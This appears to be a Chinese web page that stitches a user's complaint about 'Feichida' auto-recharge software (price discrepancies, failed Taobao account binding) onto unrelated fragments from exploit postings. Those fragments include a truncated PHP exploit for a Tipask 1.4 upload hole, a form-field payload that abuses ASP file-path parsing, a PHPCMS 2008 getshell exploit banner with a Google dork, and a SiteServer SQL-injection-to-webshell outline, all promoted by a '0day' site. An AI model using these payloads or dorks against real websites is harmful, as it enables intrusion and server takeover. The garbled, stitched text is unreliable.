哎，软件里面查询的价格跟官方提供的相差太大了，至于好不好用我就不说了，新软件，白痴都知道！

本来买的时候是因为看到货源进价低，但我进了软件里面查询价格 发现相差太大了，基本每个都是多

四毛出来！不说了，上图

软件里面查询的价格截图

官网看的价格截图

价格是稍微低点，但不是很低，20块买个软件也贵了！

哎，我弄了半天了还绑定不上淘宝帐号，原因是软件提取验证码老是出错，到发稿

前我还是没绑定上，我把软件关了，算丢了20块吧！估计以后我不会再打开这软件了！

PS：我给上级代理说开不了淘宝自动发货的设置，他给我说实在不行就手工充值吧！

我感觉我上级代理就是个白痴…还有就是我说软件移动话费查询的价格跟官方网站

提供的不一样，他说叫我看QQ的，你们觉得我该不该给差评？QB是便宜，每天限制

100个 100QB能做啥？

—————————————————-

官方的你们也别来给找我删帖子了！不会删的！我不发百度其他的原因就是怕删帖子的！

有本事你们找黑客来删吧，呵呵

飞驰达自动充值软件怎么样？飞驰达自动充值软件好不好？飞驰达自动充值软件是骗人的吗？

tipask1.4 问答系统上传漏洞 附Exp

<?
error_reporting(0);
set_time_limit(0);
ini_set(“default_socket_timeout”, 5);
define(STDIN, fopen(“php://stdin”, “r”));

$host = rtrim(ltrim($argv[1],’http://’),’/');
$path = ereg_replace(“(/){2,}”, “/”, $argv[2]);

因需要下了源码看了下

出现在\inc\img_save.asp 文件

….省略一千万行….

set fs=server.CreateObject(“scripting.filesystemobject”)

set upload=new upload_5xSoft ”建立上传对象

漏洞详情简要描述：新版的phpweb 存在这上传和解析不当漏洞

详细说明：

<input type=”hidden” name=”filepath” value=”Account/adminindex/1.asp;”>
<input type=”hidden” name=”filelx” value=”jpg”>

#!/usr/bin/php

<?php

print_r(‘

+—————————————————————————+

PHPCMS Remote Code Inject GetShell Exploit

Google Dork:Powered by Phpcms 2008

code by secr

SiteServer 3.4.4 某业务流程逻辑错误，导致SQL注入，从而得到后台管理权限，

进而拿到webshell。也可直接利用sqlserver配置不当拿到webshell或服务器权限.

问题出在UserCenter.Pages.DLL中的Register，注册流程逻辑有问题，具体如下：

0day网络再次重新开放，希望大家多多支持！